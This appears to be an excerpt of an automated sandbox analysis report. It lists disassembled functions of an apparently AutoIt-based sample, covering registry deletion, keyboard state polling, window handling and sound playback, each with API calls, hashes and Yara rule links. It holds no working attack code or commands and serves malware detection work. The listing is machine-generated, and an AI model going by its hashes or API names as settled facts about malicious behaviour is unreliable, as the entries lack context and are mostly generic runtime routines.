                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                        • Opcode ID: be4104ef07bdb44e6682899fbc478009edead2e80e9e54f63de8dafda021ecac
                                                                                                                                                                        • Instruction ID: 4d9a4966c7e9e90eb0580ecf255ed92e105d56e781a5399819302166b92b66fa
                                                                                                                                                                        • Opcode Fuzzy Hash: be4104ef07bdb44e6682899fbc478009edead2e80e9e54f63de8dafda021ecac
                                                                                                                                                                        • Instruction Fuzzy Hash: E54146766212187BDF01BB649C4BFBF77ACDF51360F10016AF904A61C2EB749A309BA4
                                                                                                                                                                        Function 002ED694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002ED6C4
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 002ED6ED
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002ED7A8
                                                                                                                                                                          • Part of subcall function 002ED694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 002ED70A
                                                                                                                                                                          • Part of subcall function 002ED694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 002ED71D
                                                                                                                                                                          • Part of subcall function 002ED694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002ED72F
                                                                                                                                                                          • Part of subcall function 002ED694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002ED765
                                                                                                                                                                          • Part of subcall function 002ED694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002ED788
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 002ED753
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                                                        • Opcode ID: 147336243531d3e35fc50b0c448bed3d97fe7c17d86ba41c10563a6fbdbcb74d
                                                                                                                                                                        • Instruction ID: de4e2d271a510b74486f2dbc8789de5155b246cf4c82199c1d35e839dab121c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 147336243531d3e35fc50b0c448bed3d97fe7c17d86ba41c10563a6fbdbcb74d
                                                                                                                                                                        • Instruction Fuzzy Hash: 70318C76A51129BBDB219F92EC88EFFBB7DEF46790F400065E805E2140DA709E45DAA0
                                                                                                                                                                        Function 002CEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 002CEFCB
                                                                                                                                                                          • Part of subcall function 0027F215: timeGetTime.WINMM(?,?,002CEFEB), ref: 0027F219
                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 002CEFF8
                                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 002CF01C
                                                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002CF03E
                                                                                                                                                                        • SetActiveWindow.USER32 ref: 002CF05D
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002CF06B
                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 002CF08A
                                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 002CF095
                                                                                                                                                                        • IsWindow.USER32 ref: 002CF0A1
                                                                                                                                                                        • EndDialog.USER32(00000000), ref: 002CF0B2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                                        • Opcode ID: edb49df67dd1cfdb850f47f36be5dc555ac81d0c9198a25bdc8730b39b15003d
                                                                                                                                                                        • Instruction ID: bd5dbbba8d7c3b18977d4a14296fc07a2c9b60dbfe004ae13895fdb5f87d779d
                                                                                                                                                                        • Opcode Fuzzy Hash: edb49df67dd1cfdb850f47f36be5dc555ac81d0c9198a25bdc8730b39b15003d
                                                                                                                                                                        • Instruction Fuzzy Hash: E6217C75510605BFE7126F20BCCAF26BB6EFB49BA4F004138F50582272DB759C64CA51
                                                                                                                                                                        Function 002CF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002CF374
                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002CF38A
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CF39B
                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002CF3AD
                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002CF3BE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                        • Opcode ID: 20158ab9de014d435f18b1c28732809f54acb807f395812b58f00ecf79dd4139
                                                                                                                                                                        • Instruction ID: 53fad1a6608680348efb041817ec7880ab3d029bda41dfd550b262d07994a85d
                                                                                                                                                                        • Opcode Fuzzy Hash: 20158ab9de014d435f18b1c28732809f54acb807f395812b58f00ecf79dd4139
                                                                                                                                                                        • Instruction Fuzzy Hash: E611E331A602A979D721B761AC4AEFF6A7CEBD2B40F000569B401E30D0DBA01994C9B0
                                                                                                                                                                        Function 00292FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 00293007
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 00293013
                                                                                                                                                                        • _free.LIBCMT ref: 0029301E
                                                                                                                                                                        • _free.LIBCMT ref: 00293029
                                                                                                                                                                        • _free.LIBCMT ref: 00293034
                                                                                                                                                                        • _free.LIBCMT ref: 0029303F
                                                                                                                                                                        • _free.LIBCMT ref: 0029304A
                                                                                                                                                                        • _free.LIBCMT ref: 00293055
                                                                                                                                                                        • _free.LIBCMT ref: 00293060
                                                                                                                                                                        • _free.LIBCMT ref: 0029306E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID: &0
                                                                                                                                                                        • API String ID: 776569668-20326164
                                                                                                                                                                        • Opcode ID: e383cae58d97b783d94b02c6a8fdeffe5945228fd21033dbca022a7cb114a93a
                                                                                                                                                                        • Instruction ID: 493a3ac7ed6997626f46d7638e8d932e5c808a3e410d4126fc23444f358bbc54
                                                                                                                                                                        • Opcode Fuzzy Hash: e383cae58d97b783d94b02c6a8fdeffe5945228fd21033dbca022a7cb114a93a
                                                                                                                                                                        • Instruction Fuzzy Hash: 92117476520108FFCF01EF94C942DDD3BA5EF05354B9145A5FA089B222DA32EB659FA0
                                                                                                                                                                        Function 002CA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CA9D9
                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 002CAA44
                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 002CAA64
                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 002CAA7B
                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 002CAAAA
                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 002CAABB
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 002CAAE7
                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 002CAAF5
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 002CAB1E
                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 002CAB2C
                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 002CAB55
                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 002CAB63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                        • Opcode ID: 933281390b60f14f072229aa30d3a4c3e320e7eae387c83adc2e64c416ddd142
                                                                                                                                                                        • Instruction ID: f9470d3afd9c6c380cfb1530b21dc8624d741bcad7d3c38f46e33480a5bfed4c
                                                                                                                                                                        • Opcode Fuzzy Hash: 933281390b60f14f072229aa30d3a4c3e320e7eae387c83adc2e64c416ddd142
                                                                                                                                                                        • Instruction Fuzzy Hash: 8451072091478D29EB31DB708815FEAAFB59F12388F08479DC5C25A1C2DA649F5CCB63
                                                                                                                                                                        Function 002C662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 002C6649
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002C6662
                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002C66C0
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 002C66D0
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002C66E2
                                                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 002C6736
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002C6744
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002C6756
                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 002C6798
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002C67AB
                                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002C67C1
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002C67CE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                                        • Opcode ID: 8dafca637cf4dcc883ff8cbed26b01b518b7897b8a31e2c53a697efdde0e19d7
                                                                                                                                                                        • Instruction ID: 9656f6ff13c36e448b0ff1f63cca0619c368044ab703670d3bd4799dda616b38
                                                                                                                                                                        • Opcode Fuzzy Hash: 8dafca637cf4dcc883ff8cbed26b01b518b7897b8a31e2c53a697efdde0e19d7
                                                                                                                                                                        • Instruction Fuzzy Hash: C7512E71A10205AFDF18CF68DD99BAEBBBAFB48315F108229F519E6290D7709D14CB50
                                                                                                                                                                        Function 00262128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00262152
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                                        • Opcode ID: 56548d006fe60fddeed166d8148ddc6c9d6073558050a52c70b50903f64bdf92
                                                                                                                                                                        • Instruction ID: c74c261fa97cafc9f3e6afdea998448f97f1ee500b6d5dd33c5474e47af6429a
                                                                                                                                                                        • Opcode Fuzzy Hash: 56548d006fe60fddeed166d8148ddc6c9d6073558050a52c70b50903f64bdf92
                                                                                                                                                                        • Instruction Fuzzy Hash: D4412B31114A41EFDB209F389C48BBA377AAB03371F144295FABA871E2C7719D96DB10
                                                                                                                                                                        Function 002613A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002A28D1
                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002A28EA
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002A28FA
                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002A2912
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002A2933
                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002611F5,00000000,00000000,00000000,000000FF,00000000), ref: 002A2942
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002A295F
                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002611F5,00000000,00000000,00000000,000000FF,00000000), ref: 002A296E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 1268354404-113007392
                                                                                                                                                                        • Opcode ID: b6290d1ceaa8c01ee4e53c05568f98e6d9217490588999daadf9cdcde14e66e7
                                                                                                                                                                        • Instruction ID: 184281ca41511e97b7f09c3be576d4569c0fd08af3cfd25d41504024e995bff3
                                                                                                                                                                        • Opcode Fuzzy Hash: b6290d1ceaa8c01ee4e53c05568f98e6d9217490588999daadf9cdcde14e66e7
                                                                                                                                                                        • Instruction Fuzzy Hash: BE516D30620206EFDB24DF29DC85BAA77B6FF48760F144528F946972A0DB70E9B4DB50
                                                                                                                                                                        Function 002F955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                          • Part of subcall function 002619CD: GetCursorPos.USER32(?), ref: 002619E1
                                                                                                                                                                          • Part of subcall function 002619CD: ScreenToClient.USER32(00000000,?), ref: 002619FE
                                                                                                                                                                          • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000001), ref: 00261A23
                                                                                                                                                                          • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000002), ref: 00261A3D
                                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002F95C7
                                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 002F95CD
                                                                                                                                                                        • ReleaseCapture.USER32 ref: 002F95D3
                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 002F966E
                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002F9681
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 002F975B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$(3$(3
                                                                                                                                                                        • API String ID: 1924731296-4147361190
                                                                                                                                                                        • Opcode ID: fc5a3e34a97859d85b472579f3c16830a2c65eb54bdceece3c86361f42907574
                                                                                                                                                                        • Instruction ID: f61b0ac1d2f7f78aff785bd023828f96728a74a399eaef3e320761d9f35f90e4
                                                                                                                                                                        • Opcode Fuzzy Hash: fc5a3e34a97859d85b472579f3c16830a2c65eb54bdceece3c86361f42907574
                                                                                                                                                                        • Instruction Fuzzy Hash: DE51AC74514304AFD705EF14DC8AFAAB7E8FB88750F400528FA55962E1CB7099A8CB52
                                                                                                                                                                        Function 002CA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,002B0D31,00000001,0000138C,00000001,00000000,00000001,?,002DEEAE,00332430), ref: 002CA091
                                                                                                                                                                        • LoadStringW.USER32(00000000,?,002B0D31,00000001), ref: 002CA09A
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,002B0D31,00000001,0000138C,00000001,00000000,00000001,?,002DEEAE,00332430,?), ref: 002CA0BC
                                                                                                                                                                        • LoadStringW.USER32(00000000,?,002B0D31,00000001), ref: 002CA0BF
                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002CA1E0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                                                        • Opcode ID: d7f339609a487f1fd4f6356df8f54e42e16301a2d34c67f9cc7f05ec87a2b17c
                                                                                                                                                                        • Instruction ID: 684c8a35d8e01da08a94ff77a46be9cdb519a84eff2d6e856c1fcea081f32ce7
                                                                                                                                                                        • Opcode Fuzzy Hash: d7f339609a487f1fd4f6356df8f54e42e16301a2d34c67f9cc7f05ec87a2b17c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2841707281011DAACB05FBE0DD86EEEB778AF18344F500165F505B2092EB756FA9CF61
                                                                                                                                                                        Function 002C0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
